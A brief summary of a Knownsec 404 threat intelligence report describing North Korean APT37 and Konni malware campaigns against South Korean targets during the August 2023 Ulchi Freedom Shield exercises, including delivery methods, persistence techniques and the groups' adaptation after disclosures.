Knownsec 404 researchers observed a sharp rise in North Korean APT activity against South Korean targets during the August 2023 Ulchi Freedom Shield joint exercises. The report says more than 80 samples were captured during the exercises and more than 200 deduplicated samples by early September, with APT37 accounting for most of the activity and LNK or CHM files commonly used as first-stage delivery. It documents APT37 use of oversized LNK packaging and two Chinotto variants, while Konni activity used LNK and CHM lures, VBS and BAT scripts, bitsadmin and certutil, CAB payloads, Run-key persistence, and collection of desktop file lists, IP data, and system information. The authors assess the activity as broad intelligence collection against South Korea, with both APT37 and Konni changing chains and obfuscation to maintain operational stability after public disclosures.